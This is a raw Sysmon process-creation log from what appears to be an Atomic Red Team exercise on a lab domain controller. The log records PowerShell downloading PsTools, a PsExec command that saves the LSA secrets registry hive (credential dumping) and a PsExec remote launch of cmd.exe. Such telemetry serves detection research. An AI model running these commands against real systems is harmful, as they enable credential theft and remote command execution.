154100x8000000000000000148763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:53:19.655{8B6011A9-848F-6143-890B-00000000F001}6836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\PSTools\PsExec.exe\"") { exit 0} else { exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x8000000000000000149306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:53:20.788{8B6011A9-8490-6143-8C0B-00000000F001}5372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-WebRequest \""https://download.sysinternals.com/files/PSTools.zip\"" -OutFile \""$env:TEMP\PsTools.zip\""
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path \""C:\PSTools\PsExec.exe\"") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe \""C:\PSTools\PsExec.exe\"" -Force} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x8000000000000000150242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:53:26.519{8B6011A9-8496-6143-8F0B-00000000F001}5440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\PSTools\PsExec.exe\"") { exit 0} else { exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x8000000000000000151087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:54:06.457{8B6011A9-84BE-6143-950B-00000000F001}4468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-WebRequest \""https://download.sysinternals.com/files/PSTools.zip\"" -OutFile \""$env:TEMP\PSTools.zip\""
Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe C:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe -Force} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x8000000000000000150807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:54:06.254{8B6011A9-84BE-6143-940B-00000000F001}4324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x8000000000000000151946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:54:12.405{8B6011A9-84C4-6143-990B-00000000F001}3568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x8000000000000000152325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:54:16.283{8B6011A9-84C8-6143-9D0B-00000000F001}5660C:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe2.34Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe -accepteula -s reg save HKLM\security\policy\secrets C:\Users\ADMINI~1\AppData\Local\Temp\secrets C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=C590A84B8C72CF18F35AE166F815C9DF,SHA256=57492D33B7C0755BB411B22D2DFDFDF088CBBFCD010E30DD8D425D5FE66ADFF4{8B6011A9-84C8-6143-9C0B-00000000F001}5720C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets"
154100x8000000000000000152289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:54:16.270{8B6011A9-84C8-6143-9C0B-00000000F001}5720C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.004\bin\PsExec.exe -accepteula -s reg save HKLM\security\policy\secrets %%temp%%\secrets" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x8000000000000000155125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:54:28.415{8B6011A9-84D4-6143-AD0B-00000000F001}5368C:\PSTools\PsExec.exe2.34Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\PSTools\PsExec.exe \\localhost -accepteula -c C:\Windows\System32\cmd.exe C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=C590A84B8C72CF18F35AE166F815C9DF,SHA256=57492D33B7C0755BB411B22D2DFDFDF088CBBFCD010E30DD8D425D5FE66ADFF4{8B6011A9-84D4-6143-AC0B-00000000F001}6352C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\PSTools\PsExec.exe \\localhost -accepteula -c C:\Windows\System32\cmd.exe"
154100x8000000000000000155115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-09-16 17:54:28.362{8B6011A9-84D4-6143-AC0B-00000000F001}6352C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\PSTools\PsExec.exe \\localhost -accepteula -c C:\Windows\System32\cmd.exe" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{8B6011A9-5DE5-6143-CEE2-400000000000}0x40e2ce2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-5E35-6143-F806-00000000F001}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"